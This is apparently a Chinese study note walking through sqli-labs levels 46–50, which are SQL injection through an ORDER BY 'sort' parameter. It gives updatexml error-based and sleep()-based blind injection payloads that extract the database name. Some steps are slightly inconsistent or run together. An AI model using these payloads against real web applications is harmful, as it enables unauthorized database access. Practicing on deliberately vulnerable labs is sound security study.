sqli-labs靶场less46-less50
less46
1.打开靶场我们来看一下
2.传参的参数变成了SORT,我们来试一下,闭合为数字型
3.既然有报错信息,那我们就是要报错注入来做
sort=1 and updatexml(1,concat(1,database()),1)
4.剩下的步骤按报错注入继续往下做就行
less47
1.打开靶场来看一下
2.这一关和上一关看起来并无区别,拿之前方法判断一下,他的闭合方式变为了单引号,我们依旧可以构造报错注入,只是闭合方式变了
sort=1' and updatexml(1,concat(1,database()),3)--+
3.剩余内容按照报错注入往下做即可
less48
1.我们打开关卡看一下
2.这一关为字符型,不需要闭合,我们使用时间盲注来做,首先来爆一下数据库名字的长度
and if(length(database())>1,sleep(5),1)
and if(length(database())>8,sleep(5),1)
3.爆出来数据库名字长度后,剩余步骤按照报错注入接着往下做即可
less49
1.打开关卡之后看一下
2.这一关与上一关基本相同,只有闭合方式为单引号,爆数据库的数据库名字长度的语句如下
1' and if(length(database())>1,sleep(5),1)1' and if(length(database())>8,sleep(5),1)3.剩余的内容与上一关的同样使用报错注入即可
less50
1.打开这一关看一下,再使用之前的方法判断是数字型注入
2.这一关依旧可以使用时间盲注来做
?sort=1 and if(length(database())>1,sleep(5),1)
?sort=1 and if(length(database())>8,sleep(5),1)3.剩余内容和前面几关一样